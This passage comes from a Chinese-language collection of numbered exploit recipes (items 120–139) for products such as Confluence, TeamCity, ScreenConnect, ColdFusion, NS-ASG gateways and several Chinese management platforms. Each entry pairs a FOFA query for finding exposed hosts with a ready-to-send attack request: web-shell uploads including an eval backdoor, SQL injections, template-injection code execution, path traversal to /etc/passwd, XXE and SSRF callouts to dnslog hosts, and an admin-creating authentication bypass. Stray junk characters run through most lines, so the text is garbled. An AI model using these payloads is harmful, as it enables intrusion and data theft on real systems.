Te: trailers7 _- N* J$ D/ T3 t2 o! T7 @( b
Connection: close) t' g% O1 p7 I) |& j' R" ?
5 \' ] l; M$ K) S
src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456
: Y' ~, Y j) C# x1 t! j r, ^/ {, ]- e/ U! o* q
% z; B8 H7 G: F4 l4 S$ p
120. 北京百绰智能S40管理平台导入web.php任意文件上传
/ ?1 f" F; F1 WCVE-2024-12539 P8 K0 U, w1 I3 _
FOFA:title="Smart管理平台"
- q5 G6 _% x% n" B7 zPOST /useratte/web.php? HTTP/1.1
+ z* y/ t+ T) KHost: ip:port/ ^. z5 ~1 f* a2 V2 H; @
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db) k3 W& t+ ^4 \: X5 q( X
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko# E5 M c/ D: b2 t
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
1 q y3 @- G3 y- z/ B* GAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.25 T6 O% h7 l( _2 A1 S
Accept-Encoding: gzip, deflate$ ~1 `- I4 i [7 K/ R' g
Content-Type: multipart/form-data; boundary=---------------------------423289041236658752706300793287 F$ H0 H& P2 ?2 y
Content-Length: 597
1 H; T% u! |3 b2 ?% ?5 HOrigin: https://ip:port
1 a* a6 w2 u2 F# J8 j% eReferer: https://ip:port/sysmanage/licence.php0 Z( O0 s. I! r3 N" j8 [% {
Upgrade-Insecure-Requests: 1
6 S, K! @/ w8 {$ O( a) {: A) Z! ?Sec-Fetch-Dest: document9 X1 J4 C- Z4 T1 Q6 ]
Sec-Fetch-Mode: navigate
6 [2 l- \, p* j7 p8 E% H& KSec-Fetch-Site: same-origin
& M) ^0 O" S; t" Y- Q# OSec-Fetch-User: ?1: U) n L% |9 l/ X" T K" Y' G
Te: trailers( |8 c/ n; e) f. f. M1 R
Connection: close
; N! |: Q1 C' n% }: n1 B
! n) _6 z* Y( m7 l-----------------------------42328904123665875270630079328
/ U1 r+ m5 ]! ~% LContent-Disposition: form-data; name="file_upload"; filename="2.php"" c+ ?1 Q; y8 K
Content-Type: application/octet-stream/ f Z: _) k7 L' T
* O5 g( C" E* m5 F<?php phpinfo()?>+ p! D2 n; U% a' |' e; q; _4 \. m
-----------------------------423289041236658752706300793288 Z% J* {: c) R- x2 }! f. g4 [; p
Content-Disposition: form-data; name="id_type"
; @$ ~2 B0 f1 w5 k& O. j* [5 }8 P' @( w/ v9 E: c, E8 m
11 b$ _3 q/ t9 t: I
-----------------------------42328904123665875270630079328- V$ O a$ R& G7 F, B
Content-Disposition: form-data; name="1_ck"2 b+ r& z+ n$ X- B
5 }, U* G/ ~, z# D4 {1_radhttp
* F8 n) L+ m, N0 I0 O-----------------------------42328904123665875270630079328
+ Q! P. l" w! V% K$ C2 ~Content-Disposition: form-data; name="mode"4 X; x$ b/ |. X+ ^ a6 |8 \
! I0 [+ f0 d- b6 N5 r9 D
import
7 x: X- }/ b( E. y" F-----------------------------42328904123665875270630079328
& y/ _# {% y; S; j, D r. A" |/ Z- e8 O# L+ M' Z) r0 O) |! z
9 W; ?( m/ |- l9 z! h& ?
文件路径/upload/2.php' V. S9 x7 m0 R7 c5 u7 K _
; D2 e6 [' [: F/ _% d, @
121. 北京百绰智能S42管理平台userattestation.php任意文件上传
7 `3 o0 A6 ~, m _( TCVE-2024-1918, h- R# L; |- `% D
FOFA:title="Smart管理平台"5 T% W+ M1 y+ X- ?
POST /useratte/userattestation.php HTTP/1.10 }3 H8 N7 e/ s g2 C" B0 Z
Host: 192.168.40.130:8443) Y4 o5 c! f6 |& c) ]* ?; N
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
8 f$ ]' Z* ~* G- K% mUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko i3 e8 Z* D. K( m8 u% I$ b' b
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.82 i& \8 W$ _8 t8 }: b
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2* U. E, s6 q* N: p" H5 ^
Accept-Encoding: gzip, deflate8 `% P1 t$ v) [* S
Content-Type: multipart/form-data; boundary=---------------------------423289041236658752706300793280 O" \' x H# g' N- \* x
Content-Length: 592# @1 G# m% {) E
Origin: https://192.168.40.130:8443- O* \& O* m0 M1 z* M
Upgrade-Insecure-Requests: 1& g7 c# @+ H5 [1 R+ M
Sec-Fetch-Dest: document8 |( U0 r' Q% D7 i+ b5 b: U1 M# e% k
Sec-Fetch-Mode: navigate
+ F. x. _6 ~0 [/ z4 g+ ?Sec-Fetch-Site: same-origin
: Z8 k# H4 j4 p) {Sec-Fetch-User: ?1
) B) M- I! [/ z- W! T9 ~Te: trailers; e8 Q2 j5 l6 o* K8 v3 P$ F
Connection: close. |3 \" u" K5 L" s( ?8 Q
* c2 u3 j. {9 w* A% `, D6 s-----------------------------42328904123665875270630079328. o$ N5 G+ C$ b
Content-Disposition: form-data; name="web_img"; filename="1.php") p3 m; W1 ?& Y; }
Content-Type: application/octet-stream! P7 H( h3 g2 S' x( ^ [
, [# f2 O8 c7 u" |9 r9 M
<?php phpinfo();?>
, U" z) J4 C G: t-----------------------------42328904123665875270630079328, S& {/ k6 |) {) p& X0 F( Q
Content-Disposition: form-data; name="id_type"
5 i0 R2 b+ \- G
. u6 V+ V1 g; x0 E6 y13 s4 h {4 q0 H$ \
-----------------------------42328904123665875270630079328
- g* i. b& H, e7 SContent-Disposition: form-data; name="1_ck"
( [$ R" q. T8 A* y' o0 S4 W0 G& `1 y# j9 r2 A8 x+ Z
1_radhttp" u+ ]9 K4 X- B1 c! v$ @2 S
-----------------------------42328904123665875270630079328) }, k3 q1 \1 L. e4 i. `3 G, l3 s6 D
Content-Disposition: form-data; name="hidwel"' T8 ` i% P3 w3 a& X. {. ]
5 x6 r) k$ [2 M4 K7 [+ g: dset
. i B6 n* s: R-----------------------------42328904123665875270630079328
- `" g' n2 E2 H9 e$ r
# Q" j5 w; @' t4 [. R9 O: \% ^, v6 I& t, l' C) s R
boot/web/upload/weblogo/1.php* ]/ z! x3 h% d% B$ |* v: M
, f7 ^; q K( q. C. m+ C) b( j) }122. 北京百绰智能s200管理平台/importexport.php sql注入4 D: E. F% v: ]; W- P5 {
CVE-2024-27718FOFA:title="Smart管理平台"
( ]% w1 k* t6 ?: j Z& l其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version() \) Q1 i b0 d7 o
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1: n9 J2 @, A# O- |, e
Host: x.x.x.x3 a3 }3 G2 Y% w, s, v) [' |$ c
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc03 }" b6 Q: N! a6 i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0( O) ~5 e! F; ?' G3 e
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 [! [9 V7 x3 L
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.24 g3 ]+ H; B5 j0 e& i% N
Accept-Encoding: gzip, deflate, br
. \' e' L: l9 w, p- j6 ? qUpgrade-Insecure-Requests: 18 }# @5 b4 L; v" ?7 }
Sec-Fetch-Dest: document9 `* M3 ~7 R4 C" T$ D
Sec-Fetch-Mode: navigate
2 e: W* V9 d) y, ]Sec-Fetch-Site: none; }/ ? L+ M9 k) k3 z
Sec-Fetch-User: ?1
1 b7 ?1 `9 D+ Y" X4 r; w8 d8 F* u3 ETe: trailers2 C F+ [* O- t: X9 |
Connection: close( e( e' @" z( N/ a# N
% `5 Z$ z0 |2 Q3 e2 W
m% x. v3 p$ w+ E) b- C5 d: }123. Atlassian Confluence 模板注入代码执行
+ s, t$ |- U0 |$ _' \+ g7 nFOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
$ @+ r* l/ O: _( c4 V* EPOST /template/aui/text-inline.vm HTTP/1.1' Q4 x: S: B9 Z6 P, O9 ]- V: K
Host: localhost:8090- z- D/ Z! v. A' r) w& q9 `# [
Accept-Encoding: gzip, deflate, br
6 Q3 |. Q8 Q+ J+ ?$ b7 NAccept: */*
: \; k5 B k" Z) @9 {! o% LAccept-Language: en-US;q=0.9,en;q=0.8
. p2 c) ]5 J) v5 ]1 MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
7 s: f; Q$ J$ q8 I/ e$ Y6 z) ?5 PConnection: close' _' R# u& S4 x) J; K1 [1 I1 ^
Content-Type: application/x-www-form-urlencoded% a5 y) M) c) h, C; I3 C% z* ]: h
+ I2 d6 x( N- e. s( o( G6 I
label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))
: R# n5 t( b4 L$ i9 ~+ E! t6 o
- {! V# i7 v! \8 ^( ?1 K* }
% s: L7 [ x; i124. 湖南建研工程质量检测系统任意文件上传" s7 W) E1 I+ ]# Q6 M
FOFA:body="/Content/Theme/Standard/webSite/login.css"/ p4 S( N P; y
POST /Scripts/admintool?type=updatefile HTTP/1.1
' _. `7 F% Z; \! w; G; e9 s! YHost: 192.168.40.130:8282
( p8 k6 h K. h3 ~+ iUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
( y; g' p3 x$ GContent-Length: 72
% m+ b8 k9 s4 s# W2 n' M4 Q: UAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.82 y" L B9 T8 G& c
Accept-Encoding: gzip, deflate, br/ q7 a6 e4 j3 ?4 b- P3 d a4 A% O* }
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+ r, v) X5 g8 R. N( v9 dConnection: close
5 p5 i' n, \/ m% |Content-Type: application/x-www-form-urlencoded$ B0 t+ c/ c) ~5 s; g; C- R
, t7 p. k) u% L. ?# a% ?2 P; b4 u$ E- rfilePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>
; C! {( W. e7 K$ \$ w' H$ r" ~% _4 P X) ~. Z6 U% U
! a' G5 ~+ M7 d8 S; ohttp://192.168.40.130:8282/Scripts/abcgcg.aspx, n" x7 d ?6 Z- B3 O$ V
7 {% _8 v; u5 w9 |5 @2 ?/ I& m: U i
125. ConnectWise ScreenConnect身份验证绕过4 B5 s+ P* j0 p) A
CVE-2024-1709' _) Z2 L0 }7 d' y E8 P( u
FOFA:icon_hash="-82958153"/ A+ S% z* O3 Q, C* `2 V3 a
https://github.com/watchtowrlabs ... bypass-add-user-poc
% e( Q/ V F S" y
d" P$ U! U5 n. ?, T$ y7 N, d
! V' c* o' a2 L6 i使用方法2 B. W% k* w& u; K
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!3 P; c7 K' x1 J$ \9 {
* E/ l" d6 r; X4 a( {, ]/ J$ w- A$ W
创建好用户后直接登录后台,可以执行系统命令。
0 ~/ J0 U; ?" t
! I8 J( r( \2 |7 J8 `6 X% o126. Aiohttp 路径遍历- ^# r' V3 q( W. q2 F
FOFA:title=="ComfyUI". e% } X, F8 G0 ^7 j U2 _$ |8 {0 Y
GET /static/../../../../../etc/passwd HTTP/1.1
; ^6 c* A. | q2 ~' W; ]3 _- oHost: x.x.x.x, o6 K6 Z, A, I
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
: l$ D- p/ M0 oConnection: close/ A7 r# Y% h4 B" Q( g
Accept: */*
0 R7 f5 B- J- U5 [- lAccept-Language: en
/ r/ U% R. H7 z& b( z1 ^( f" @Accept-Encoding: gzip
/ q- k7 i: n8 i1 x: y
: e0 h- ]% C1 z. \/ J- m4 Z" u6 w2 F
127. 广联达Linkworks DataExchange.ashx XXE7 t) v' E3 k( I5 }, E
FOFA:body="Services/Identification/login.ashx"
) R( W* U- @7 Y% sPOST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
! }7 U# X) J! Y+ ?6 oHost: 192.168.40.130:8888
: Q* k% \3 A& e1 Y0 C. JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
( [! w |' L% uContent-Length: 415
0 z# q K6 `! d% O3 u# zAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
; Y, }4 Y$ }, xAccept-Encoding: gzip, deflate# M% ]4 `8 j* Y0 K2 {# w+ D, M" j
Accept-Language: zh-CN,zh;q=0.9( R- e2 H+ J J8 a! U6 p* v
Connection: close
7 H2 w6 I9 z& W1 C8 _& `Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
& D6 S; ^% s6 @, T* CPurpose: prefetch1 s) X' l3 z# l3 g
Sec-Purpose: prefetch;prerender9 ^& `# i$ C. r' `1 G" e
; i. s7 I# ?: n
------WebKitFormBoundaryJGgV5l5ta05yAIe0
5 g, D7 @7 h, ?Content-Disposition: form-data;name="SystemName"
2 T+ o, H" v% X: l D3 H" T5 I9 O& \& U3 _
BIM. g `; f- T& P2 S. h
------WebKitFormBoundaryJGgV5l5ta05yAIe0
* `+ a$ |3 M/ I2 l* }Content-Disposition: form-data;name="Params"$ q4 v/ x1 g- k9 }/ ]( h: I5 f; |
Content-Type: text/plain
; k# J+ f# C$ O2 z/ J
" m1 L# D Q# l<?xml version="1.0" encoding="UTF-8"?>) H* x- ?8 b* ^9 y1 G
<!DOCTYPE test [. ~2 T- b2 u0 M! U9 a
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
6 `7 H, u, C% { O]
& G+ }0 t, s: \$ x4 D># `3 M1 v9 v: I! s
<test>&t;</test>
, k4 Z* @! H& q" e6 a------WebKitFormBoundaryJGgV5l5ta05yAIe0--
0 d' l1 q3 S2 j3 f* r* n8 h3 M. y. H& F( L
4 q' X3 Y, ]5 g; e* D
7 _! e9 V9 {9 m* j7 ^5 Z128. Adobe ColdFusion 反序列化" D' [: j2 R4 H+ L
CVE-2023-38203, J# P1 [1 X) b" n& x. f7 n( G3 \: |
Adobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)
# k' l* @3 x' S& g1 T# bFOFA:app="Adobe-ColdFusion"
% {/ B" x6 Z. t0 \" L* gPAYLOAD* }+ m: F p* i- a8 y$ m
( {/ A. ^# j# m
129. Adobe ColdFusion 任意文件读取
/ S1 _8 V2 [3 T+ W. U- t6 ~CVE-2024-207675 D$ ?; C. P. y6 X; H
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"2 q4 w b/ m( ^' l$ K$ z
第一步,获取uuid/ P& O3 _9 d; R9 K
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
# h ]$ @' I; T8 m xHost: x.x.x.x) k' } D+ c% k) l; H8 j+ N) f
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36, B$ H2 \) W7 ]6 a# M f
Accept: */*$ o; }' F8 [# I, p( h9 q L
Accept-Encoding: gzip, deflate
; S% I/ B) m' V4 _. S6 NConnection: close, G1 M5 M. h/ i# |2 e9 S
/ N7 V5 U! N- z7 w9 e- C w
+ c. x8 v" X0 S. B( E第二步,读取/etc/passwd文件; \8 W3 E* H: ]' I9 H
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
. o! g1 x- ~: M' oHost: x.x.x.x
2 H5 b) Z8 {& b l+ cUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
% K7 h G+ ^$ I' p; pAccept: */*
' G2 f1 C: J4 Q& L1 XAccept-Encoding: gzip, deflate
/ C' R& v+ ?6 y8 \Connection: close7 q# i" S: N! |) i
uuid: 85f60018-a654-4410-a783-f81cbd5000b9" O# g1 v! O! U) p$ \
4 Z8 D/ I; e+ E7 A; \5 i: d" h$ ~: `' H; C3 k& S+ I
130. Laykefu客服系统任意文件上传
, r/ R: N- T& H/ M& x8 i' i/ } QFOFA:icon_hash="-334624619"
1 q# ] e/ ?: d, s9 RPOST /admin/users/upavatar.html HTTP/1.1$ Q# ?, B' p/ d; t# t# H2 L+ _
Host: 127.0.0.1
8 f( `, _. x. o/ \" ?Accept: application/json, text/javascript, */*; q=0.01- H! g$ i+ t3 ]
X-Requested-With: XMLHttpRequest
, B4 h; j+ T# C1 t8 E' @User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26* H# L8 ^/ Y: ?8 {" J* n
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
5 y4 b J2 k( {Accept-Encoding: gzip, deflate# M: v% B' Q% V) ]: p
Accept-Language: zh-CN,zh;q=0.94 G+ Y% D+ ]3 [2 O! U; F4 e
Cookie: user_name=1; user_id=3
, A0 a5 c6 d/ K! H, Y" z8 lConnection: close0 g! D6 [* Q( ~. `% K! C
; b% _, i5 v% P1 u- m------WebKitFormBoundary3OCVBiwBVsNuB2kR: k1 f `2 l' G
Content-Disposition: form-data; name="file"; filename="1.php"
0 T5 ?4 l) r/ f, XContent-Type: image/png
! {# ^0 k' @8 \( N
* I Z, v! w6 I9 E0 b2 e3 `<?php phpinfo();@eval($_POST['sec']);?>% n7 A( I3 ?1 J2 `3 P
------WebKitFormBoundary3OCVBiwBVsNuB2kR--$ L; a3 L" Y8 x4 _" U
5 r B: D& s) l {
# j. |: r" y7 ~5 G2 P9 o1 C6 |131. Mini-Tmall <=20231017 SQL注入 ^3 \- O/ f5 Q9 h9 a& `) c
FOFA:icon_hash="-2087517259", u9 ]5 E* f2 x% n: ^) z2 z
后台地址:http://localhost:8080/tmall/admin2 u% E8 r2 u# Q# |0 N. z. [
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)
6 f+ Q- m; W: a5 F) ~% y& v2 ]: r. P; z* p
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过3 ?: {) t) `8 }( s; Y) K* o
CVE-2024-27198
3 X/ B) v$ _2 h; x% D- b" aFOFA:body="Log in to TeamCity"
6 ?7 z# _: j3 `# @/ vPOST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
& g7 O( d, N1 X8 XHost: 192.168.40.130:8111! u4 f O$ F' a: I
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
6 }8 h( ?) K7 `- G* TAccept: */*
* |' O- w" |5 ]8 I; J! E/ t9 NContent-Type: application/json
+ e; u' @, J' m8 Q* |/ l8 zAccept-Encoding: gzip, deflate
/ y% ?, l% d7 u/ c7 c& U
2 |/ l N' e7 u% Z6 ~. M{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}+ p; o1 z- V; H& c* L4 F. e+ ^/ [
7 F6 u& s: N1 D6 Q i, @/ w
5 Q3 v* ?# V" E8 ^& DCVE-2024-27199
! r8 l4 `# E% B2 C/res/../admin/diagnostic.jsp. l# U0 {4 O2 ~: M4 d" ?
/.well-known/acme-challenge/../../admin/diagnostic.jsp; G# g7 a+ [5 S8 B4 }/ j
/update/../admin/diagnostic.jsp
* p5 L" _: @: k- V& F( v- J8 F
$ m8 f. {5 D- s [$ Z1 r" j; A7 C" R) o2 F. v4 X! j
CVE-2024-27198-RCE.py
9 K5 |/ `" X9 ]% ^' O' Y: A9 ]9 ]( e6 I; L
133. H5 云商城 file.php 文件上传
3 Q* U2 n( Z \) uFOFA:body="/public/qbsp.php"1 ~ R- N) V( n5 M, H8 H
POST /admin/commodtiy/file.php?upload=1 HTTP/1.17 ^- s: A p8 n% x1 d
Host: your-ip& U' m+ u" M) V
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36) r9 ^2 _+ }) N0 b. B
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx/ v0 Y8 b$ M2 K' Q
2 J& Q) r$ d% H& y------WebKitFormBoundaryFQqYtrIWb8iBxUCx
" _, d' l/ H9 O- K7 a; U! j. P7 fContent-Disposition: form-data; name="file"; filename="rce.php"
w- `8 i" r9 }& z6 \Content-Type: application/octet-stream7 n; I' @9 o6 E! Z' b# v+ a
: R, n# F+ V8 |( M7 T9 h
<?php system("cat /etc/passwd");unlink(__FILE__);?>, R$ K; X( C* {; t( Y
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--
+ q$ V! j% v. l' Z* \
2 `3 A: x7 k% @+ r
0 @6 p' o- W/ ~' L" j7 u
- j. n# i4 R) f( Z0 U3 d134. 网康NS-ASG应用安全网关index.php sql注入
. [# f: K; `% D+ J' m& QCVE-2024-2330. C+ Z( }; \ V* V5 }: `
Netentsec NS-ASG Application Security Gateway 6.3版本
; D2 e' ?1 O8 s: }% `1 zFOFA:app="网康科技-NS-ASG安全网关"+ t6 q1 R1 g' L+ d* l# U: {
POST /protocol/index.php HTTP/1.1
( H$ J) f5 z- L& oHost: x.x.x.x4 Q, v: o# I( `
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de. {7 G. i \* {2 _# A
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
1 s! v3 t8 ?* T* p! B; e7 IAccept: */*
$ S# K b4 M. A0 m% W) y& cAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
0 c/ I5 H5 O: N T; y5 hAccept-Encoding: gzip, deflate
% y$ v! t4 w# B. f9 F k6 `Sec-Fetch-Dest: empty/ q& Y7 p( ?. d& I
Sec-Fetch-Mode: cors
9 m8 a6 S. @' I+ z- \9 ~Sec-Fetch-Site: same-origin0 w( N0 w/ w* m; D/ N }6 Y" t
Te: trailers
' N. |1 I9 p" Q! l: O, ~# HConnection: close" C0 Y2 m2 o! o
Content-Type: application/x-www-form-urlencoded" p- l# k& M+ p
Content-Length: 263
% z; c2 H2 }& }; C$ t9 U# H7 e7 J, z; Q5 Z! x3 N. M# X
jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}
( S0 P4 R4 x: K# ?/ d8 \8 K1 J% R* w1 t P3 z' f; n$ A+ i
8 f D! b) |* C; v9 t& W/ m4 k135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入- i8 w1 U0 |- b4 d0 a3 Q
CVE-2024-2022/ E6 T- ^/ |+ J9 m
Netentsec NS-ASG Application Security Gateway 6.3版本
7 y$ p- Q( ^0 F, P7 [. r5 nFOFA:app="网康科技-NS-ASG安全网关"
9 ?7 @ A- x6 b; v+ ~GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1* n$ l! L+ P+ [: N# A; B
Host: x.x.x.x
- E8 {+ M0 h5 w+ X1 g% D' c$ lUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.367 ~ K8 }3 y* @! I/ M
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
) n- e1 @% {( S1 p% wAccept-Encoding: gzip, deflate, x- p' w( H' k( j: M9 R- h
Accept-Language: zh-CN,zh;q=0.9& w |: A8 X1 J' U& }5 Q
Connection: close
- u# k# `8 C( T5 |( b) V# [6 i5 d0 w. c! T5 S
' S9 w) U0 d; G, c- F! e( v8 g. K: n% s136. NextChat cors SSRF+ d" r+ _4 F& C3 m& I
CVE-2023-49785
. c+ z, v1 I" [" }; b7 T( x$ v4 J' OFOFA:title="NextChat"0 r# `9 c8 P6 B# c
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
% V9 D2 H. _4 _+ W% T9 C# F4 xHost: x.x.x.x:10000
+ A5 K' ^# N7 n( A4 OUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36( k( k' C; a7 F1 P9 U
Connection: close7 g) D" b: b! d7 n$ j/ q2 ^* W
Accept: */*, M3 Z) q' D8 ?/ I0 u
Accept-Language: en
7 N0 v% ~/ q& Y7 w; fAccept-Encoding: gzip7 t9 i. L8 J0 `; y
! w3 H! t: ]6 y; U. j! T& U2 P* S
. r" k- g8 I4 p7 \137. 福建科立迅通信指挥调度平台down_file.php sql注入
' n% D6 \; s8 ~* TCVE-2024-2620- y2 ~) O/ T9 m& {; O
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
- O$ G5 V, T: [. r% Z" ^2 XGET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1* k. g. w2 w$ _- L9 u
Host: x.x.x.x& @0 L1 u+ p& V9 g
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
. p# s* X- _ @Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
1 ~8 H, {9 z" ^Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2, S$ o- H$ C# n/ I
Accept-Encoding: gzip, deflate, br0 n' R# m7 ^% T3 E& y
Connection: close
0 g/ h, U/ \/ T1 |( eCookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj$ H4 ]1 t; g6 k$ M$ R1 |
Upgrade-Insecure-Requests: 1
+ }8 N0 e$ P$ `) _! h/ y6 r0 a: d
8 v" b2 I* m# w( n2 l: I2 D
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
+ X* O; j9 c. {5 f( gCVE-2024-2621+ q2 B- t$ o( G" ^' r
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"% d9 d6 i$ Y* ^2 T6 R! |+ q" G
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
6 s H9 Q" c5 J# I- BHost: x.x.x.x
3 ^' i: m4 J% ~( LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0/ D0 N( J- r( P8 f( }$ `. ~! o, ~
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.87 t; R2 r4 I! |8 @
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2/ X- C7 s4 q: B$ ^
Accept-Encoding: gzip, deflate, br5 {0 S: Q# H4 s, f& {6 \
Connection: close
6 [& m/ q6 x3 N8 _; u. C- O* R% f! LUpgrade-Insecure-Requests: 1
& U+ w y1 O. v4 e
4 D* ^- {* x. ]8 W/ K) Z; `1 j* o2 Q( A: q: n
139. 福建科立讯通信指挥调度平台editemedia.php sql注入/ w! D+ h' I& f* L8 M
CVE-2024-2622! l9 B4 Y% c+ r
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
I- \# W% ]1 {$ R& v. e: s8 U0 }) y( eGET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
: z2 c0 Q# c" d' p3 h3 g+ e, Y1 PHost: x.x.x.x
